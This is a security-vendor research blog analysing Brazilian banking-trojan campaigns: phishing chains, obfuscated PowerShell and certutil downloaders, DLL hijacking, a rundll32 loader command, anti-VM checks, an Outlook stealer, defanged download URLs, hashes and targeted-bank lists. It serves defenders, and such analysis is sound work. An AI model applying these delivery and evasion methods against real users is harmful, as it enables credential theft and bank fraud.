<img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=116645602292181&amp;ev=PageView&amp;noscript=1">

Research by: Assaf Dahan and Joakim Kandefelt

Executive Summary

For more than a decade, Brazil has been considered a major contributor to global cybercrime. Countless security reports have detailed a plethora of nefarious activities linked to Brazilian threat actors, who mainly target the financial and private sector. Brazil is particularly known for being home to huge botnets that send out spam and phishing emails and proliferate infostealers and banking Trojans. After India and China, Brazil is the world's third worst botnet infected country, according to The Spamhaus Project.

In 2018, Cybereason’s Nocturnus team analyzed numerous campaigns related to several Brazilian financial malware. This blog shows the pervasiveness of these Brazilian-made malware, which target online banking customers of over 60 banks in nearly a dozen countries throughout Latin America, Spain and Portugal. This blog continues research presented in our earlier blog and maps the evasive infection and delivery methods used by Brazilian threat actors in order to distribute malware.

Want to see more research from Team Nocturnus? Click here.


The campaigns, which target customers of more than 60 banks worldwide, deliver different kinds of financial malware. Antivirus vendors have assigned this type of malware generic names like: Banload, Banbra, Bancos, Boleto, Delf and Spy.Banker. Despite the variation in the final malware payload, Cybereason identified three key stages that were common to most of the attacks involving Brazilian financial malware.

Brazilian financial malware banking

The multi-stage delivery infrastructure helps attackers to minimize the risk of detection. By implementing various evasive techniques, the attackers successfully bypass signature/heuristic-based engines, thus ensuring the delivery of the final malware. While the multi-stage delivery approach is not new in cybercrime, its adoption by Brazilian threat actors has proven to be highly effective at evading many anti-virus products, as demonstrated by the low detection rate presented in our research.

In each stage, we observed commonalities in the tools, techniques and procedures (TTPs) that are shared across campaigns. These TTPs include:

  • Social engineering as an entry point
  • Multiple redirections via URL shorteners and the usage of Dynamic DNS services
  • Payloads hosted on legitimate online storage services and CDNs (content delivery networks)
  • Obfuscated PowerShell downloaders employing command-line logging evasion
  • Living off the land techniques that abuse Microsoft-signed binaries
  • Abusing trusted applications via DLL hijacking
  • Splitting the main payload into two or more components

Related Post-infection Malware

Our research revealed interesting aspects of the Brazilian malware ecosystem. We observed different types of Brazilian malware being used in conjunction by the same threat actor. In some of the endpoints infected with Brazilian financial malware, we noticed additional Brazilian-made malware, such as infostealers, cryptocurrency miners and a malware that steals data from Microsoft Outlook. This finding gives us a glimpse into the different ways in which threat actors can capitalize on previously gained foothold, in order to increase their potential profits. 

Brazilian-made Malware, Spanish-Speaking Targets

Discussing Brazilian financial malware may imply that this threat only targets Brazilian online banking customers, but our research clearly shows that Brazilian threat actors have expanded their operation to Spanish-speaking countries in Latin America and Spain.

Brazilian financial malware bankingObserved targeted countries: Brazil, Argentina, Chile, Bolivia, Colombia, México, Venezuela, Portugal and Spain

Based on the data from recent campaigns, Spain is the most second targeted country after Brazil. Other countries targeted in recent campaigns include Mexico, Argentina, Venezuela, Colombia, Bolivia and Chile.

Our research demonstrates how different types of Brazilian-made malware, originally designed to target Brazilian banking users, were repurposed to target other countries and their respective regional banks. We observed references to more than 60 banks embedded within the malware's code. (See the list of targeted banks in this section).

Brazilian financial malware bankingURLs of foreign banks embedded in a Brazilian malware

One Source-code, Many variants

Cybereason analysts were able to trace the origin of various Brazilian malware to a Remote Access Tool (RAT), whose source code is publicly available on Github. While the identity of the author is known, there is no proof that this author has a direct link to the financial malware discussed in this blog. Cybereason estimates that the publicly-available source code was repurposed by different threat actors who later added banking modules as well as anti-analysis features, that were present in the financial malware analyzed in this blog.

Table of Contents

Multi-Stage Delivery Infrastructure

Chained Delivery: an Evasive Network Pattern

Main Entry Point: Phishing Emails

Stage #1: Obfuscated Downloader Scripts

Evading Command-line Detection using Environment Variables

Living Off the Land: Abusing Microsoft-Signed Applications

Stage #2: PowerShell Downloader

Stage #3: Main Payload Execution

Abusing Trusted Applications via DLL-Hijacking

Splitting the Payload - Because Two is Better than One!

Using Rundll32.exe to execute the Main Payload

Related Post-Infection Payloads: Outlook Malware & InfoStealers

Distribution of Additional Malware

Outlook PowerShell Stealer

Contents of Amazon S3 Bucket

Brazilian-made Malware, Spanish-Speaking Targets

Brazilian-Made Malware, Originally made to target Brazilian Users

Back to the Source: Open-Source RAT, Many Variants


Indicators of Compromise



Multi-Stage Delivery Infrastructure

Over the course of 2017-2018, Cybereason observed many variations to the infection flow. However, there seems to be a basic formula that most infections adhere to:

Infection Vector: The infection chain starts with a phishing email masquerading as a legitimate business invoice. The email body usually contains either a link or an attachment (pdf, zip, batch script, html) that will fetch or run the first stage downloader.

Stage 1 - Downloader: An obfuscated script or downloader command (.cmd, .lnk, .vbs, .js) is used to download the second stage payload. The downloader often points to a shortened URL that redirects to a Web hosting service, dynamic DNS or CDN to fetch the second stage payload.

Stage 2 - Downloader: Mostly an obfuscated PowerShell script that downloads the main payload. In some cases the second stage downloader has additional functionality, such as creating persistence and performing anti-analysis checks.

Stage 3 - Main Payload: Main malware payload that steals online banking data from the targeted banks found in the malware configuration. The configuration is either embedded in the binary or downloaded from a command-and-control server. Most payloads are Windows executable binaries, developed in Delphi.

Brazilian financial malware banking

Chained Delivery: an Evasive Network Pattern

During our analysis of these campaigns, Cybereason observed many legitimate services that the threat actors chained together to deliver financial malware. These services include several URL shorteners, Dynamic DNS, online storage services, and CDNs (Brazilian threat actors have been known to use CDNs to deliver malware).

Using these different services together makes the generated network traffic appear legitimate, increasing the chances that it won’t be flagged by IOC/heuristic-based engines. This technique seems to bypass many network security products, antivirus programs and may even evade some security analysts.

Example 1: Multi-stage delivery as observed in network traffic

URL ShortenerDropboxURL ShortenerFacebook CDNMalicious Site/C2 Gate

Brazilian financial malware banking

Example 2: Multi-stage delivery as observed in network traffic

URL ShortenerDynamic DNSURL ShortenerGithubMalicious Site/C2 Gate

Brazilian financial malware banking

Table of common services being used as part of the threat actor’s infrastructure

URL shorteners goo.gl, bit.ly, tinyurl.com, bit.do
Online storage dropbox.com, sendspace.com, gitlab.com, github.com, amazonaws.com,000webhostapp, pastebin.com, googleusercontent.com
CDNs cdn77.org, cdn.fbsbx.com (Facebook’s CDN)
Dynamic DNS publiccloud.com.br, ddns.net, game-server.cc (dyndns), hopto.org, no-ip.org

Example of first stage payload hosted on Gitlab: 


Brazilian financial malware banking

The extracted content is an obfuscated .cmd scriptlet with a very low detection rate:

Main Entry Point: Phishing Emails

Cybereason found that phishing emails were used for the initial infection. The email body usually contains either an attachment or a link to a URL shortener that points to hosting websites where the first stage payload is stored. The payloads often masquerade as Flash/Java updates.

Most emails share a similar subject line and allege to be invoices (“FATURA” in Portuguese). Another common theme is spoofing emails to make them look like they came from VIVO, Brazil’s largest telecommunications company.

Example 1: Spoofed VIVO Emails and Fake Invoices

The infection chain starts after the user opens the PDF attached to the spoofed email:

Brazilian financial malware banking(SHA-1: 86C7312D9E786D89FC12973B7584F6CAF39805C3)

Examination of the PDF reveals a stream containing a shortened URL:

Brazilian financial malware banking

Once the user clicks anywhere on the PDF, the code will fire a request to the shortened URL, which at the time of the detection had zero antivirus detections:

Brazilian financial malware banking

The URL resolves to the following DropBox URL that hosts a ZIP file containing the first stage downloader script:


File name: 2Via-Fatura-13082018.zip

Brazilian financial malware banking

Example 2: .lnk file downloaded from a Web-hosting website

In one recently observed campaign, the victims were led to this file sharing website URL and encouraged to download a ZIP file:

Brazilian financial malware banking

The ZIP file holds a .lnk file (arq1561.lnk) that contains an obfuscated downloader payload:

Brazilian financial malware banking(SHA-13723E2A328AAFB359116DFC987222C5001BF59D7)

Once users click on the .lnk file, it spawns cmd.exe and powershell.exe processes, which download a secondary payload:

Brazilian financial malware banking

Additionally, an Internet Explorer instance launches and loads a legitimate Adobe website, probably to allay any suspicions that the users have about the downloaded file and to distract them from what’s going on in the background:

Brazilian financial malware banking

Stage 1: Obfuscated Downloader Scripts

In 70 percent of the infections, the infection chain traces back to three main file extensions: .bat, .cmd and .lnk. The scripts are usually contained in an archive (.rar/.zip) to bypass email and spam filters. In addition to the batch files, we also observed other extensions, such as .exe (Windows Executable) and .chm (compiled HTML), sent over as email attachments.

The combination of downloaders bundled in archives proved to be highly effective at bypassing antivirus products. Many of the analyzed payloads had a low detection rate, ranging between 0-17, out of 59 antivirus vendors.

Brazilian financial malware bankingExamples of payloads received in phishing emails with a low antivirus detection rate

Evading Command-line Detection using Environment Variables

Most of the first stage payloads consisted of an obfuscated script or a set of obfuscated commands. The batch script below uses an obfuscation that gradually builds up its payload, as detailed in this blog. The PowerShell payload is set as an Environment Variable (in this case the variable is called “system”):

pasted image 0

This obfuscation type appears to be adopted from Daniel Bohannon’s Invoke-Obfuscation project. Once PowerShell is executed, the actual downloader payload does not appear in the process’ command-line arguments:

Brazilian financial malware banking

PowerShell command-line arguments: -nop -win 1 -

However, by examining the environment variables at runtime, one can observe the downloader command set to the “system” environment variable:

Brazilian financial malware banking

Based on our observations, this technique is widely-used by Brazilian threat actors, and provides yet another testimony to the efforts made by the threat actors to evade both static detection by using obfuscation as well as detection based on command-line logging by using environment variables.

Living Off the Land: Abusing Microsoft-Signed Applications

The Brazilian threat actors seem keenly aware of the trendy usage of Microsoft-signed and trusted binaries (aka LOLBins) to download or execute payloads. In addition to the commonly seen PowerShell and Windows script engines, we observed other Microsoft binaries being used across different campaigns.

Example #1: Using msiexec.exe as a Downloader

Brazilian financial malware banking

The above .lnk file spoofs an Internet Explorer shortcut. Once executed, a secondary payload is downloaded, extracted and executed using Microsoft’s msiexec.exe:

Brazilian financial malware banking

Target command:

image (6)-1

The shortened URL resolves to the following URL (FaceBook's CDN):


The downloaded payload is an msiexec file, which serves as a container that deploys the “windows.bat” in %appdata%:

Brazilian financial malware banking

Contents of the batch file:

Brazilian financial malware banking

The deobfuscated payload is the following PowerShell downloader command stored in an environment variable (“day”):


This downloader fetches another PowerShell payload, which ultimately drops the main payload.

Example #2: Using Certutil as a Downloader

Brazilian financial malware banking

The above RAR archive contains a .lnk file, which upon execution will download a payload using Microsoft’s Certutil.exe with the “-URLCache” and “-f” flags:

Brazilian financial malware banking

The executed command will download and launch a batch file (secondary downloader):


Example #3: Using Certutil to base64 Payloads

Brazilian financial malware banking

We observed a .lnk file that included the following command, which uses Microsoft’s Certutil to decode a base64 payload:


The decoded payload is further obfuscated with simple caret obfuscation (^):


The deobfuscated command downloads a secondary payload:



Stage #2: PowerShell Downloader

Brazilian financial malware banking

Our investigation showed variation in the types of second stage downloaders across different campaigns. The main purpose of the second stage downloaders is to fetch an additional payload, in many cases the main payload. Some secondary downloaders showed additional capabilities, such as persistence creation, UAC bypass and anti-research checks.

Example #1: Persistence and fetching secondary payload

The following second stage downloader is a PowerShell script that checks for an existing infection, drops a batch file that checks for values in the registry, drops a .lnk file that points to the aforementioned batch file for persistence and fetches a secondary xor-encrypted payload from the same remote server. The script has low detection rate (3/54):

Brazilian financial malware banking

Initially, the script checks for a likely previous infection by searching for a file name with the day’s date (in the form of yyyymmdd) in the %temp% directory and, if this file is unavailable, it downloads a bitwise XOR-encrypted payload:


The full batch file script is built dynamically by the PowerShell script. Here we see it being built with environment variables as seen in other instances throughout the different campaigns.



The .lnk file is created via Windows Script Host (commonly referred to as Wscript) and is used for persistence, as it will point to the batch file when executed (the $cmdFileName variable contains the path to the batch file) :


The script uses a scheduled task to bypass UAC (User Account Control). The created batch file is executed once, and then the task is deleted to remove as much evidence as possible:


Contents of batch file:

Brazilian financial malware banking

Example #2: Obfuscated Downloader with Anti-Virtual Machine Checks

While analyzing an incident, we found the following PowerShell script, which looked different from the previous downloader. The script was likely obfuscated by the ISESteroids PowerShell extension, which provides a built-in obfuscation feature. The script had a particularly low detection rate (2/57):

Brazilian financial malware banking

After deobfuscating the script, this downloader conducted a few anti-virtual machine checks. These checks are part of the threat actors’ evasion techniques and attempt to prevent researchers from studying the main payload. As seen below, the script will attempt to use WMI to query for these virtualization products: VirtualBox, VMware Virtual Platform, Virtual Machine, HVM DOMU:


Brazilian financial malware banking

Once the “coast is clear”, the script will create persistence via a .lnk file, which will execute the malware via Rundll32.exe.


Stage #3: Main Payload Execution

The campaign’s main payloads consisted mostly of common Brazilian malware that antivirus vendors generically name Banload, Banbra, Bancos, Boleto, Delf and Spy/Banker. Brazilian financial malware is known for its effectiveness in overcoming multi factor authentication (MFA), by implementing sophisticated social-engineering tricks to extract SMS codes and other security tokens information, using overlay screens as previously shown.

Cybereason identified variations in the way that the main payloads were executed. In this part, we will examine executions that involve abuse of trusted third-party applications via DLL hijacking as well as using built-in Microsoft-signed binaries (also known as “LOLBins”) to execute the malware code. Using these techniques lowers the risk of detection.

Abusing Trusted Applications via DLL-Hijacking

As discussed in an earlier blog, the Brazilian threat actors seem quite fond of leveraging DLL-hijacking techniques against trusted security vendors, including Avira and McAfee, and trusted technology companies like VMware, NVIDIA, HP, Realtek and Adobe.

Splitting the payload - Because Two is Better than One!

We noticed that the Brazilian threat actors evolved how they implemented DLL-hijacking. Earlier infections that used this technique implemented a classic approach of deploying a vulnerable trusted binary along with a fake DLL. This TTP was previously documented being used in the context of Brazilian financial malware. In some cases, the fake DLL was even signed with revoked or self-signed certificates in an attempt to further lower the possibility of detection.

Newer samples observed in 2017 and 2018 added another layer of evasion by splitting the malware payload into two components:

  1. Loader: A fake DLL that loads the encrypted malware payload to memory, decrypts and executes it.
  2. Malware payload: Encrypted file that cannot run on its own and is dependent on the loader.
Brazilian financial malware banking

This codependency between the loader and the encrypted payload makes the detection and analysis of this malware harder. For the malware to run, it requires that both files reside in the same folder. In most cases, the loader DLL will also validate that it is running in the context of the vulnerable application, or else it will crash.

Example #1: Remoto Overlay RAT Abusing Avira via DLL Hijacking

Brazilian financial malware banking

An email attachment sent to a user contained a .lnk file, which executed the following commands that led to a download of a binary (reymr.exe):

Brazilian financial malware banking

The binary is a signed Avira product renamed by the attackers, as indicated by the file metadata. See this VirusTotal link for more information:

Brazilian financial malware banking

Further investigation showed that along with reymr.exe, the PowerShell script also dropped the following files:

File Name Purpose SHA-1
reymr.exe Legitimate Avira.SystrayStartTrigger signed binary 762BF93E6265B4E74BD0BFCAA447F1A619DB2F58
msvcr120.dll Legitimate Microsoft® C Runtime Library F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
msvcp120.dll Legitimate Microsoft® C Runtime Library EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
avira.oe.nativecore.dll Malicious DLL exploiting Windows Search order Hijacking to execute malware. Decrypts the contents of RestartManagerUninstall.mui 312F4DC26FD0C277F9727CE3B943123CBEB127C1
RestartManagerUninstall.mui Encoded blob loaded after avira.oe.nativecore.dll with Trojan functionality  9A944B0933F004DB012DB202BF5C2BE1E231FBB5

Reymr.exe includes avira.oe.nativecore.dll in its import table:

Brazilian financial malware bankingOnce reymr.exe is executed, it will load the fake DLL (avira.oe.nativecore.dll) and decrypt the malware payload (RestartManagerUninstall.mui):
Brazilian financial malware banking

The main payload was identified as the Remote Overlay RAT, previously discussed here.

Using Rundll32.exe to execute the Main Payload

In some recent spam campaigns that we monitored, the malware authors favored the built-in Rundll32.exe to launch the loader DLL payload. Once the DLL is executed, it will load and decrypt a second (sometimes even a third) encrypted binary, which is the malware main payload.

Example #1: Financial Trojan launched by Rundll32

In this example, we can see a PowerShell process that was spawned by cmd.exe as a result of a .lnk file execution. PowerShell downloads a secondary payload from a malicious website:

Brazilian financial malware banking
Brazilian financial malware banking

Download URL: hxxp://barca21[.]zapto[.]org/barca21/vx1.txt

Brazilian financial malware banking

The PowerShell payload drops and extracts a ZIP file containing the following files:

File Name Purpose SHA-1
Yaew.toib Loader binary (DLL) 3F9E9BD8330660B0DA23EE8D54787A44E53DDF65
Yaew1.toib Encrypted financial Trojan payload (DLL). Exported function: OCSVFWBO56 87DBACFE8727B9DA1EACE101BEE84D06388FA7B6
G Encryption & configuration data D5E3969BB36A675CF9CE60A88ABB5C8DE7C3BD80

Command line:

"C:\Windows\System32\rundll32.exe" C:\Users\Public\YAEW.TOIB ,,, OCSVFWBO56

Brazilian financial malware banking

The unpacked payload seems to be a variant of a Brazilian Remote Overlay RAT:


Example #2: Rundll32 injecting Main Payload to Windows Media Player

In this example, we will follow the execution starting from the second stage PowerShell downloader:

Brazilian financial malware banking

The network PCAP shows a second stage PowerShell that downloads a ZIP file (PK signature):

Brazilian financial malware banking

The zip file contains OAzBrxSXRoTOBssa.dll and OAzBrxSXRoTOBssa.

List of dropped files:

File Name Purpose SHA-1
1010180844353.bmp Zip (dropped by PowerShell) 3344EF3B32DF03057721ED6E76F276B9073A0932
OAzBrxSXRoTOBssa.dll Malware loader exported function: dGuCCzlxnosaJBpk C523C65C7BD9EE09360C24BC706985BA5361D724
OAzBrxSXRoTOBssa Encrypted payload 1A86E3D82AF58DA6A3CC5B3849B7D81565945433

The PowerShell script extracts its contents and runs the DLL via rundll32.exe, pointing to the exported function “dGuCCzlxnosaJBpk”:

Executed command:

Screen Shot 2018-11-28 at 3.44.18 PM

Once the loader decrypts the main payload (OAzBrxSXRoTOBssa), it injects the malicious code to Windows Media Player:

Brazilian financial malware banking

The Injected PE (MZP header) is mapped into the memory space of Windows Media Player:

Brazilian financial malware banking

The dumped payload shows indications that the malware was likely compiled on a machine with Brazilian Portuguese language settings, as can be found in the the RC_DATA resource section:

Brazilian financial malware banking

Once executed, the malware sends an initial beacon via a POST request to the command-and-control server:


Brazilian financial malware banking

Related Post-Infection Payloads: Outlook Malware & InfoStealers

Other Brazilian malware that was related to the malware we analyzed was also found on the compromised machines. These post-infection payloads provide a glimpse into the Brazilian malware ecosystem and, to some extent, offer an understanding of what the threat actors are after.

In addition to the banking Trojans, we found that the same campaigns were distributing cryptocurrency miners, infostealers and malware that targets Microsoft Outlook. Malware that targets Outlook is a particular concern since it poses a major risk to organizations worldwide. The malware contains features that leverage Outlook’s functions, like the ability to query victims’ contact lists. Threat actors usually use this information for spam campaigns, but can also sell it on the dark market to other attackers who want information on an organization they’re planning to attack.

Distribution of Additional Malware

Following is an example of a malware which was designed to steal credentials using Overlay phishing, as well as downloading additional malware. The malware and its auxiliary components were found in %programdata%:

File name Purpose SHA-1
Rltkapo32.exe Renamed authentic Microsoft’s Certmgr.exe F18EEBAEA4460B057F5B49E8239779F1C0C05BB9
Cryptui.dll Fake DLL, serves as a loader and injector D3AE2843261528D8B4A5D6070661FE302E7A1FA9
Rltkapo32.driver Main payload 036B68413E64BE54A919916A7360B2B4142E59D0
Borlndmm.dll Legitimate Delphi Borland Library 76E3A2004E5BA7F5126FAC9922336F38E928D733

As seen before, Brazilian threat actors often exploit DLL hijacking, and this time the vulnerable application was Windows’ “certmgr.exe” (aka, Certificate Manager Tool). The fake DLL (cryptui.dll) loaded and injected to svchost.exe the main malware payload (Rltkapo32.driver):

Brazilian financial malware bankingRenamed Windows Certmgr.exe, loading a fake DLL

Examination of svchost's injected payload, shows that the Delphi malware will try to present a fake Login form to its victims, in order to steal their credentials (possibly even organizational credentials):

Brazilian financial malware banking

The injected svchost process communicates with the C2 servers and downloads a second payload :

exe2Mathilde.exe, SHA-1: 15166EF05CB3278E388C46359835A64CFB4D29EC

Brazilian financial malware banking

Mathilde.exe is an SFX file which extracts a script called “linsoldo.cmd”, which is a PowerShell downloader:

brazilian malware financial bank(SHA-1: CDE80C9D1875C97BAB89778B60E33AE30887D2E4)

The script fetches an Outlook stealer PowerShell script hosted on an Amazon S3 bucket.

Outlook POWERSHELL Stealer

The downloaded PowerShell script (“Outpos.data“) is designed to steal information from Microsoft Outlook clients and users’ harvest emails addresses. Its main capabilities:

  • Receive encoded commands from the C&C server
  • Gather information from Outlook (Contact list, mailboxes, emails, Outlook folders)
  • Write collected data to a .txt file in %temp% folder
  • Post data to the C&C server over HTTP

Excerpt from the PowerShell script shows the exfiltration data:

Brazilian financial malware banking

Also interesting to notice the comments in Portuguese left by the malware’s Author:

Brazilian financial malware banking

The data is posted to a server (, running a server that runs XAMPP. The error message, we can see an admin panel referencing the name “coringa”, as can be seen below:

Brazilian financial malware banking

“Coringa” is likely a reference to a Brazilian RAT called “Coringa-RAT”, whose source code is publicly available. It is likely that the threat actors are using the RAT in other campaigns as well. Cybereason, however, did not observe a direct use of Coringa-RAT in the aforementioned campaigns.

Brazilian financial malware bankingCoringa-RAT Panel

Contents of Amazon S3 Bucket

The URL from which the Outlook malware was downloaded points to an Amazon S3 Bucket:

Brazilian financial malware bankingS3 Bucket URL: hxxps://s3-eu-west-1[.]amazonaws[.]com/teste34s2/

The bucket contains several kinds of Brazilian malware, such as: second stage downloaders, Outlook mail stealer and also a Brazilian banking trojan (Remote Overlay RAT):

File Name Purpose SHA-1
outpos.data Outlook mail stealer (PowerShell script) 0657FAA51EB8417A2D63388A9BA37997A2B5F323
image2.png Zip file contains vulnerable NVIDIA binary and Brazilian financial malware

ZIP Contents:
Nvsttest.exe (legitimate Nvidia application) -
_.dll (Loader + injector) -
_.prx (malware payload) -

bol.png PowerShell Downloader 16FAEF11D46CFBCAFE8B58064C2C38B96950BE9C
Poratal.txt / Testefad.txt PowerShell Downloader E138609B66FC6B9C6C688DE6B5DC094A782C6474
jardilhas.mcas PowerShell Downloader 0C2CD86F1838A48E2B71430D3314182CC2318914
Cadeagod.maz PowerShell Downloader C80AD41891EFE21798CC8F04B73CC64F4D883EA1
jasonfsa.vom PowerShell Downloader 174FF790DBFB5053755D5164B26CA90F1A4D7CB8
juremal4l3l.dfas PowerShell Downloader D89AEFC78440710DDF0CFC91FF3BB590FF7D1C4F
mortlin.sdo PowerShell Downloader 9BDB62C5871E45AF57F4D9A1D94C446627FC2ECF

The unpacked payload of the Remote Overlay RAT shows that the malware targets Brazilian banks such as: CitiBank Brasil, Safra National Bank, Banco da Amazonia, Itau Brasil and Bradesco:

Brazilian financial malware banking(SHA-1: A97B6D83589DA0ACD60E87EA9B29B84516DF7E52)

Brazilian-made Malware, Spanish-Speaking Targets

Brazilian financial malware banking

Cybereason analyzed multiple infections involving different Brazilian financial malware that did not target Brazilian bank users. Instead, the malware configuration was set to target bank users in Latin America and Spain. This finding bodes well with earlier research papers that discuss various aspects of Brazilian cybercrime’s role in the global threat landscape and its proliferation to various regions. Research from ESET, TrendMicro, Kaspersky and ElevenPath has more details on that topic.

The following examples, taken from infections that occurred in 2018, show that online bank users in Spanish-speaking countries are also being targeted. These countries include Argentina, Bolivia, Chile, Venezuela and Spain. Cybereason found earlier samples of Brazilian malware targeting more countries, such as Mexico, Portugal, Colombia and other Latin American countries. 

Example #1: Brazilian Financial Malware targeting bank customers in Latin America and Spain


  • Brazilian Banks
Brazil do Banco, Santander, Itau Unibanco, Banco Bradesco, Sicredi, Unicred do Brasil, Sicoob, Banco de Inter, Banco de Nordeste, Banco Mercantil do Brasil, Caixa Economica Federal
  • Bolivian Banks
Banco Mercantil Santa Cruz (BMSC), Banco Union, Banco Nacional de Bolivia (BNB), Banco Bisa, Banco de Crédito de Bolivia (BCP), Banco Fassil, Banco FIE, BancoSol, Banco Ganadero and Baneco
  • Chilean Banks:
Itaú CorpBanca, Scotiabank Azul (BBVA), Banco Falabella, Banco Edwards, Banco Ripley, Banco de Crédito e Inversiones (BCI), Banefe (Santander), Scotiabank, Banco Industrial y de Comercio Exterior (BICE), Banco Internacional and Banco Consorcio
  • Spanish Banks:
Bankia, Sabadell, Bankinter, Ibercaja, Liberbank, Abanca, Kutxabank, Unicaja, Santander, Banco Bilbao Vizcaya Argentaria (BBVA) and CaixaBank

Example #2: Brazilian Spammer / Info-Stealer targeting Venezuela & Bolivia

Brazilian financial malware banking(SHA-1: BAAD23A6A7644FDCC1B24D43294D04E001BA328B)

Venezuelan Banks:

Bancaribe, Banco Fondo Común (BFC), Banco Exterior, Banco Sofitasa, BBVA Provincial, Banco Universal, Banco Industrial de Venezuela, Banesco Banco Universal, Banco Caroní, Banco Venezolano de Crédito, Banco Nacional de Crédito, El Banco Federal

Example #3: Brazilian Banker Targeting Argentinian Users

Extracted image from the malware resource, shows an overlay screen meant to bypass Multi-Factor Authentication, targeting customers of Bank of Patagonia:

Brazilian financial malware banking(SHA-1: 92746D90584A17C25BB6B6D3A095A7A3FBE46D0E)

List of Argentinian banks targeted by the Brazilian malware:

Brazilian financial malware banking

Argentinian Banks:

Banco Patagonia, Itaú Argentina, Standard Bank Argentina, Banco Macro, Industrial and Commercial Bank of China (Argentina), Santander Rio

Brazilian-Made Malware, Originally made to target Brazilian Users

During our investigation, it was evident that the different malware types were created by Portuguese-speaking threat authors and were originally designed to target Brazilian users. This is supported by the embedded Portuguese strings and references to specific security softwares that belong to Brazilian banks, as can be seen below:

Command & Control instructions in Portuguese:

Brazilian financial malware banking(SHA-1: 2058F993785B3669A4143D563A6E238A8E12C524)

List of commands embedded in the malware’s code shows Portuguese strings:

Screen Shot 2018-11-28 at 12.08.33 PM

Excerpt from UAC-bypass procedure used by the malware (“not possible to verify UAC”):

Brazilian financial malware banking

Strings referencing specific software distributed by Brazilian banks to enhance online banking safety, such as: G-buster Plugin (GbPlugin), Aplicativo Bradesco and Aplicativo Itau


Back to the Source: Open-Source RAT, Many Variants

Brazilian financial malware banking

Based on the functionality and string similarity, Cybereason estimates that different kinds of Brazilian malware borrowed code or even based on the source code of a Remote Access Tool (RAT) called “Delphi Remote Access PC”. The RAT is open-source and publicly available on Github. It was coded in 2015 by a Brazilian user whose Internet handle is “senjaxus”. This user also co-coded another RAT called AllaKore. The author clearly states that he is not responsible for any misuse of his code:

Brazilian financial malware banking

From Portuguese:

“This source was created by Richard Maickonn. Distribution of this source is free!Contact: senjaxus[at]gmail.com.   


Even though the code has fully functional remote access capabilities, it does not seem to contain functionality directly related to financial malware, namely, targeting of banks or using a screen overlay social engineering. In addition, unlike typical Brazilian financial malware, the Github source code does not contain anti-analysis code, like the ability to detect virtual machines, security products or Brazilian software. It is our estimation that these features were likely added by different malware authors who repurposed the open-source RAT code.

Examples of code similarity between the Github source code and other Brazilian malware payloads:

Brazilian financial malware banking(SHA-1: BCFCECF791C47A844D07E870F58266FE0F28F0DE)

Example #2: Brazilian malware targeting Chilean Bank Users

Brazilian financial malware banking(SHA-1: 56B235985199D0DBAF8EA75B6704AF2841CB50D7)

Example #3: MPRado Remote Access Tool

This RAT seems heavily based on the source code of Delphi Remote Access PC. This is likely a variant of the RAT:

Brazilian financial malware banking(SHA-1: 5B8DF646C2AE5EE9CD11B598FA0631AF41578C97)


In this blog, we surveyed the techniques used by Brazilian threat actors as observed by Cybereason throughout 2017-2018. We also showed how different financial malware campaigns share similar traits around delivery methods. The analysis of the tools and techniques highlights how effective these methods are at evading antivirus products, as demonstrated repeatedly by the low detection rate. In addition, we showed how Brazilian threat actors are expanding their campaigns and targeting online banking users across Latin American countries as well as Spain. Finally, we linked several payloads to an open-source RAT that was created by a Brazilian author whose code was likely repurposed and turned into various banking trojans by Brazilian threat actors.

Indicators of Compromise





IP addresses



Interested in how the Cybereason platform works?

Learn More